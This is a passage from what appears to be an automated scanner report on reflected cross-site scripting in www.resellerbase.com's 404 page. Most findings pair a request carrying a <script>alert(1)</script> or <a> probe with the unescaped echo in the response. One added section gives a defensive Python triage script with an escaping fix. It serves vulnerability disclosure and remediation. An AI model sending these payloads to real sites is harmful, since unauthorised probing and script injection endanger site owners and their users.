This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/search.php34a3f<script>alert(1)</script>36c195c3224?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php34a3f<script>alert(1)</script>36c195c3224?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2720. http://www.resellerbase.com/detail/39/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cfacd<a>d5179e85e85 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Searchcfacd<a>d5179e85e85&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Searchcfacd<a>d5179e85e85&opt=2 was not found on this server.</p>
...[SNIP]...

2.2721. http://www.resellerbase.com/detail/39/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5b4ed<a>30a6c44bff4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...5b4ed<a>30a6c44bff4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...5b4ed<a>30a6c44bff4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2722. http://www.resellerbase.com/detail/39/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9bb1e<script>alert(1)</script>d573c7949af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2&9bb1e<script>alert(1)</script>d573c7949af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2&9bb1e<script>alert(1)</script>d573c7949af=1 was not found on this server.</p>
...[SNIP]...
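
Every reflection in this report, the "Firm" ones carrying an <a> probe and the "Certain" ones carrying a <script> probe alike, lands in the same place: the paragraph of the site's 404 page that repeats the requested URL verbatim. That is one sink to fix, presumably a custom 404 handler printing the request URI unescaped; the root cause is an inference from the captured responses, not something the report states. The script below is an added example, not code from this report or from resellerbase.com. It builds a constructed model of that sink and of its escaped version, copies the two response fragments from findings 2.2721 and 2.2722 as sample input, and shows how to use the scanner's random prefix/suffix markers to pull out exactly what the server echoed and classify it: raw, HTML-entity-encoded, percent-encoded, or otherwise transformed. The percent-encoded case is the delivery caveat a tester should keep in mind: if the victim's client percent-encodes the angle brackets before sending, the server sees %3C and %3E and the markup is inert unless something decodes it; the scanner's requests above sent them raw, which is why the responses show them live.

```python
"""
Triage helper for the reflected-XSS findings in this report.

Added example, not code from the report or from resellerbase.com. Every
response above echoes the request target inside
"<p>The requested URL ... was not found on this server.</p>"; the two
renderers below are a constructed model of that sink (assumed to be a
custom 404 page printing the raw request URI) and of its fix.
"""
from typing import Optional
from urllib.parse import unquote
import html

# Response fragments copied from findings 2.2721 and 2.2722 above.
CAPTURED_2_2721 = (
    "<p>The requested URL /detail/39/themes/search.php?keyword=search..."
    "5b4ed<a>30a6c44bff4&Submit3=Search&opt=2 was not found on this server.</p>"
)
CAPTURED_2_2722 = (
    "<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Search"
    "&opt=2&9bb1e<script>alert(1)</script>d573c7949af=1 was not found on this server.</p>"
)

# Constructed skeleton of the 404 page; the real page is SNIPped in the report.
PAGE = ('<html><head><title>Error 404 - Page Not Found</title></head><body>'
        '<p>The requested URL {target} was not found on this server.</p></body></html>')


def vulnerable_404(request_target: str) -> str:
    """Constructed model of the observed sink: request target inserted verbatim."""
    return PAGE.format(target=request_target)


def hardened_404(request_target: str) -> str:
    """Same page with the target HTML-escaped first. The PHP equivalent is
    htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES, 'UTF-8')."""
    return PAGE.format(target=html.escape(request_target, quote=True))


def reflected_between(body: str, prefix: str, suffix: str) -> Optional[str]:
    """Return whatever the server emitted between the scanner's random markers
    (e.g. 9bb1e ... d573c7949af), or None if either marker is missing. The
    markers are what let you locate the probe even after it has been transformed."""
    start = body.find(prefix)
    if start < 0:
        return None
    start += len(prefix)
    end = body.find(suffix, start)
    if end < 0:
        return None
    return body[start:end]


def classify(reflected: Optional[str], probe: str) -> str:
    """
    raw             - probe echoed byte-for-byte: markup is live, the finding is real
    html-encoded    - < > & " ' became entities: safe in a text node
    percent-encoded - %3C/%3E reached the page: inert unless something decodes it
    transformed     - reflected but altered some other way: inspect by hand
    absent          - markers not found: no reflection in this response
    """
    if reflected is None:
        return "absent"
    if reflected == probe:
        return "raw"
    if reflected in (html.escape(probe, quote=True), html.escape(probe, quote=False)):
        return "html-encoded"
    if unquote(reflected) == probe:
        return "percent-encoded"
    return "transformed"


def triage(body: str, prefix: str, probe: str, suffix: str) -> str:
    """One verdict for one response, given the marker/probe/marker triple that was sent."""
    return classify(reflected_between(body, prefix, suffix), probe)


SCRIPT_PROBE = "<script>alert(1)</script>"
# Request target from finding 2.2722, rebuilt from its GET line.
TARGET_2_2722 = ("/detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2"
                 "&9bb1e" + SCRIPT_PROBE + "d573c7949af=1")


def demo() -> dict:
    """The cases a reviewer wants side by side: captured, modelled, fixed, and the delivery caveat."""
    # A client that percent-encodes angle brackets sends this instead of the raw target.
    client_encoded = TARGET_2_2722.replace("<", "%3C").replace(">", "%3E")
    return {
        "2.2721 captured (<a> probe)": triage(CAPTURED_2_2721, "5b4ed", "<a>", "30a6c44bff4"),
        "2.2722 captured": triage(CAPTURED_2_2722, "9bb1e", SCRIPT_PROBE, "d573c7949af"),
        "model, vulnerable": triage(vulnerable_404(TARGET_2_2722), "9bb1e", SCRIPT_PROBE, "d573c7949af"),
        "model, hardened": triage(hardened_404(TARGET_2_2722), "9bb1e", SCRIPT_PROBE, "d573c7949af"),
        "model, vulnerable, client percent-encoded":
            triage(vulnerable_404(client_encoded), "9bb1e", SCRIPT_PROBE, "d573c7949af"),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:45} {verdict}")
```

Run it directly to print a verdict per case. The fix for the observed sink is a single change at the point where the 404 page prints the request target; once it is escaped, re-running the report's own requests should move every entry here from raw to html-encoded. A "transformed" verdict on one of the "Firm" findings is the cue to go and look for the filter the scanner's note asks you to examine by hand.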

2.2723. http://www.resellerbase.com/detail/39/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 21afd<a>989d56fb846 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=221afd<a>989d56fb846 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=221afd<a>989d56fb846 was not found on this server.</p>
...[SNIP]...

2.2724. http://www.resellerbase.com/detail/39/webcams-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/webcams-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dfd8<script>alert(1)</script>3a93148e7f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2dfd8<script>alert(1)</script>3a93148e7f7/39/webcams-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2dfd8<script>alert(1)</script>3a93148e7f7/39/webcams-com.html was not found on this server.</p>
...[SNIP]...

2.2725. http://www.resellerbase.com/detail/39/webcams-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/webcams-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3775b<script>alert(1)</script>8f69bbd2bc0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/3775b<script>alert(1)</script>8f69bbd2bc0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/3775b<script>alert(1)</script>8f69bbd2bc0 was not found on this server.</p>
...[SNIP]...

2.2726. http://www.resellerbase.com/detail/4/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 309d1<script>alert(1)</script>9a73efb917 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail309d1<script>alert(1)</script>9a73efb917/4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail309d1<script>alert(1)</script>9a73efb917/4/ was not found on this server.</p>
...[SNIP]...

2.2727. http://www.resellerbase.com/detail/4/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 375b8<script>alert(1)</script>5f1e36abee5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4375b8<script>alert(1)</script>5f1e36abee5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4375b8<script>alert(1)</script>5f1e36abee5/ was not found on this server.</p>
...[SNIP]...

2.2728. http://www.resellerbase.com/detail/4/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 88170<script>alert(1)</script>54ab9549905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/?88170<script>alert(1)</script>54ab9549905=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/?88170<script>alert(1)</script>54ab9549905=1 was not found on this server.</p>
...[SNIP]...

2.2729. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12e64<script>alert(1)</script>4c0a641db0ee5e52e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail12e64<script>alert(1)</script>4c0a641db0ee5e52e/4/rating.php?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail12e64<script>alert(1)</script>4c0a641db0ee5e52e/4/rating.php?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2730. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e048c<script>alert(1)</script>2ab13702f2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile048c<script>alert(1)</script>2ab13702f2b/4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile048c<script>alert(1)</script>2ab13702f2b/4/rating.php was not found on this server.</p>
...[SNIP]...

2.2731. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dca4<script>alert(1)</script>e4a7fe80c25d5b085 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/47dca4<script>alert(1)</script>e4a7fe80c25d5b085/rating.php?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/47dca4<script>alert(1)</script>e4a7fe80c25d5b085/rating.php?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2732. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61b70<script>alert(1)</script>0d41909a657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/461b70<script>alert(1)</script>0d41909a657/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/461b70<script>alert(1)</script>0d41909a657/rating.php was not found on this server.</p>
...[SNIP]...

2.2733. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9869<script>alert(1)</script>1dae71aeb88298808 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4/rating.phpe9869<script>alert(1)</script>1dae71aeb88298808?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.phpe9869<script>alert(1)</script>1dae71aeb88298808?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2734. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba392<script>alert(1)</script>112874f371f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/rating.phpba392<script>alert(1)</script>112874f371f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.phpba392<script>alert(1)</script>112874f371f was not found on this server.</p>
...[SNIP]...

2.2735. http://www.resellerbase.com/detail/4/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12cce<script>alert(1)</script>99539ab88ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/rating.php?12cce<script>alert(1)</script>99539ab88ce=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
